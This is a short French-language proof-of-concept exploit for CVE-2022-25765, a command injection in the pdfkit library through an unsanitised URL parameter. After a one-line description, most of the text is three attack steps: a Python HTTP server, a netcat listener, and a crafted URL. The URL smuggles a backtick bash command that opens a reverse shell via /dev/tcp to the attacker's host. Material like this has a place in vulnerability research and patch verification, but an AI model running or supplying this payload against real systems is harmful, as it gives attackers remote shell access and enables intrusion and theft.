
Exploit de preuve de concept pour CVE-2022-25765 démontrant une injection de commande dans pdfkit 0.8.6 via un paramètre d'URL non assaini, permettant l'exécution de code à distance et un reverse shell.
Le package pdfkit à partir de 0.0.0 est vulnérable à une injection de commande où l'URL n'est pas correctement assainie.
1- python3 -m http.server 80
2- nc -lnvp 'Target Port'
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}